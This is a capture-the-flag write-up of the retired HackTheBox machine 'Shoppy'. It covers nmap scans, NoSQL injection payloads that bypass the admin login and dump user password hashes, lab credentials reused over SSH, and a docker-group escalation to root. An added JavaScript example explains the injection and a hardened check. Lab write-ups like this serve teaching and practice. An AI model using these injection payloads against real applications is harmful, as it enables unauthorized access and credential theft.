HackTheBox - Shoppy

Summary

HackTheBox - Shoppy is an easy Linux machine on HackTheBox created by lockscan. It had an injection that led to broken authentication. With a further injection we were able to leak the admin credentials, with which we can access Mattermost. There we find SSH credentials and get access to the box. Checking sudo -l, we see that a password manager can be run as the user deploy; getting its password, we can get the deploy user's shell password. As the deploy user we are in the docker group, which we can use to get root on the box.

nmap-scan

# Nmap 7.92 scan initiated Sun Sep 18 02:59:26 2022 as: nmap -sC -sV -oN nmap/shoppy 10.129.9.20
Nmap scan report for 10.129.9.20
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 18 02:59:48 2022 -- 1 IP address (1 host up) scanned in 21.82 seconds

nmap all ports

# Nmap 7.92 scan initiated Sun Sep 18 03:00:07 2022 as: nmap -p- -oN nmap/shoppy-all 10.129.9.20
Nmap scan report for shoppy.htb (10.129.9.20)
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat

# Nmap done at Sun Sep 18 03:14:45 2022 -- 1 IP address (1 host up) scanned in 877.86 seconds

Web

We find an admin login panel.

With the payload

admin'||'

we get access to the admin panel.
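Why the payload above gets past the login, and the check that stops it, as an added example that is not the application's code. It assumes the login concatenates the submitted username into a JavaScript predicate evaluated once per document (as a MongoDB `$where` clause would be); the collection, function names and hash values are constructed.

```javascript
// Constructed in-memory stand-in for the user collection.
const users = [
  { username: 'admin', password: 'hash-a' },
  { username: 'josh', password: 'hash-b' },
];

// Vulnerable (assumed pattern): input is spliced into code that is then
// evaluated against every document, with `this` bound to the document.
function buildWhere(username, password) {
  return `this.username === '${username}' && this.password === '${password}'`;
}

function findVulnerable(username, password) {
  const predicate = new Function(`return (${buildWhere(username, password)});`);
  return users.filter((doc) => predicate.call(doc));
}

// Hardened: reject non-string input and compare values as data, never as code.
function findSafe(username, password) {
  if (typeof username !== 'string' || typeof password !== 'string') return [];
  return users.filter(
    (doc) => doc.username === username && doc.password === password
  );
}

// The payload from the page closes the quoted string and appends `||`.
// Because && binds tighter than ||, the predicate becomes
//   (this.username === 'admin') || ('' && this.password === 'x')
// so the password comparison no longer matters for the admin document.
const payload = "admin'||'";
console.log(buildWhere(payload, 'x'));
console.log('vulnerable:', findVulnerable(payload, 'x').map((u) => u.username));
console.log('hardened:  ', findSafe(payload, 'x').map((u) => u.username));
```

The type check in `findSafe` also rejects object-valued input, which matters when the request body is parsed as JSON and passed straight into a query.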

Searching for admin in the user search feature, with the payload

';return 'a'=='a' && ''=='

we get:

[{"_id":"62db0e93d6d6a999a66ee67a","username":"admin","password":"23c6877d9e2b564ef8b32c3a23de27b2"},{"_id":"62db0e93d6d6a999a66ee67b","username":"josh","password":"6ebcea65320589ca4f2f1ce039975995"}]

Cracking the password, we get the password for josh: remembermethisway

Checking Mattermost with those creds, we see creds for SSH.

Trying SSH with:

sshpass -p 'Sh0ppyBest@pp!' ssh jaeger@shoppy.htb

Checking sudo -l, we see that we can run /home/deploy/password-manager as the deploy user.

We can see that the master password is Sample.

With the master password, we can get the password for the deploy user:

username: deploy
password: Deploying@pp!

We can SSH to the box with:

sshpass -p 'Deploying@pp!' ssh deploy@shoppy.htb

Checking the groups of the deploy user, we see that it is in the docker group.

Using GTFOBins, we get a root shell via docker.

https://www.hackthebox.eu/achievement/machine/77992/496

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/shoppy/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.